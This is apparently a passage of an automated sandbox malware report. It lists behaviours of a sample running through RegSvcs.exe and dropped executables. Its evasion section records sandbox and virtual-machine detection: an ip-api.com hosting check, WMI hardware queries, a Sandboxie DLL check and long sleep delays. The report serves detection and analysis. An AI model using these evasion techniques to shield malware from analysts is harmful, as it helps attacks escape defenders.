                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeAPI/Special instruction interceptor: Address: 401E2B4
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeAPI/Special instruction interceptor: Address: 408E2B4
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeMemory allocated: 47E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeMemory allocated: 4850000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599452Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599336Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599102Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599889Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599777Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599661Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4960Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4845Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3019Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6798Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2762Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7057Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe TID: 2612Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe TID: 3636Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599452Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599336Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599102Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99655Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99214Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99071Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98939Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98030Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99886Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99559Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599889Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599777Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599661Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99780Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99576Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99305Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99192Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98749Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99655Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99541Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99436Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99326Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99212Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99109Jump to behavior
